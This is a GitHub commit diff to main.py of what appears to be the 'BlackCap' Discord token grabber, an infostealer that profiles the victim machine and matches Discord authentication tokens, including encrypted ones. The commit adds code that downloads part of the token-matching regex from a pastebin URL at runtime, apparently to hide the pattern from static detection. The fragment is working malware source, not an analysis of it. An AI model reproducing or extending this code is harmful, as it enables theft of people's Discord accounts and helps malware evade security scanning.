Update main.py

This commit is contained in:
What about KSCH 2022-12-27 10:28:25 +01:00 committed by GitHub
parent 702d1b4584
commit 03c5002cc4
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 6 additions and 1 deletions

View File

@ -105,6 +105,11 @@ vctm_pc = os.getenv("COMPUTERNAME")
r4m = str(psutil.virtual_memory()[0] / 1024 ** 3).split(".")[0] r4m = str(psutil.virtual_memory()[0] / 1024 ** 3).split(".")[0]
d1sk = str(psutil.disk_usage('/')[0] / 1024 ** 3).split(".")[0] d1sk = str(psutil.disk_usage('/')[0] / 1024 ** 3).split(".")[0]
BlackCap_Regex = 'https://pastebin.com/raw/f4PM9Dse'
reg_req = requests.get(BlackCap_Regex)
clear_reg = r"[\w-]{24}" + reg_req.text
class Functions(object): class Functions(object):
@ -247,7 +252,7 @@ class bl4ckc4p(Functions):
self.baseurl = "https://discord.com/api/v9/users/@me" self.baseurl = "https://discord.com/api/v9/users/@me"
self.regex = r"[\w-]{24}\.[\w-]{6}\.[\w-]{25,110}" self.regex = clear_reg
self.encrypted_regex = r"dQw4w9WgXcQ:[^\"]*" self.encrypted_regex = r"dQw4w9WgXcQ:[^\"]*"